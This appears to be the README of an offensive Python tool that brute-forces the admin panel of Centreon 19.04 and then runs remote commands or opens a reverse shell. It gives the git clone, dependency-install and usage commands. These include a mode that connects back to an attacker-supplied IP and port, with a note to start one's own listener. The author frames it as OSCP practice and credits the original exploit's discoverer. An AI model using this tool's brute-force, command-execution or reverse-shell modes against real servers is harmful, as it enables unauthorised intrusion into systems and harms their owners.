Due to improper control of failed logins it is possible to attempt to brute force the administration panel of Centreon 19.04, and then make use of unsanitized variable control to execute remote commands on the targets server. This version of the exploit includes the brute force mode, to attempt to get credentials, then a choice between an arbitary command execution or a straight attempt to get a reverse shell.
From within your Linux terminal, you can use the following command to download the program.
git clone https://github.com/0xskunk/Centreon-v19.04-Brute-Forcer-RCE.gitWe need to make sure you have the packages installed that the program requires before it will run.
First, install pip, which is a package manager for Python.
sudo apt install python-pipThen, we install the required libraries.
pip install colorama art bs4 urllib3 requestsThis is all the prerequisites you need!
Magic makes use of the ArgParse library, meaning you can get the help menu to appear by typing:
python magic.py -h
python magic.py -t 10.10.10.10 -p 80 -m 1
python magic.py -t 10.10.10.10 -p 80 -m 2
Note: You must start your own listener to connect back to.
python magic.py -t 10.10.10.10 -p 80 -m 3 -i 192.168.69.1 -l 443
Code is open source and I welcome feedback, comments and requests. I wrote this in order to try to improve my usage of classes in Python, and as practice for my OSCP custom exploitation attempts.
Originally, @mhasker wrote and discovered the exploit. I just added a brute forcer, the option to execute alternative commands, and shazam with the colours. I've linked his github below - great work.
